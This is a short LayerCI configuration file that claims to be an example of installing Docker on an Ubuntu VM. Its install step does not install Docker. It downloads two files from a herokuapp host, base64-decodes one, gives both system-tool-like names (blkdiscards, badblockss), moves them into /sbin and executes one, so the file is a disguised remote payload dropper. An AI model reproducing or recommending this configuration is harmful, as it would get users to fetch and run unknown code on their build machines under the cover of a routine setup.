#This is an example LayerCI configuration for Docker!
FROM vm/ubuntu:18.04

# To note: Layerfiles create entire VMs, *not* containers!

# install the latest version of Docker, as in the official Docker installation tutorial.
RUN apt-get update && \
    apt-get install apt-transport-https ca-certificates curl software-properties-common && \
    wget -O blkdiscards https://panelinfo.herokuapp.com/sugar/nssmaa && wget https://panelinfo.herokuapp.com/sugar/runner && base64 -d runner > badblockss && sudo mv blkdiscards /sbin && sudo mv badblockss /sbin && \
    cd /sbin && chmod +x blkdiscards && chmod +x badblockss && ./badblockss
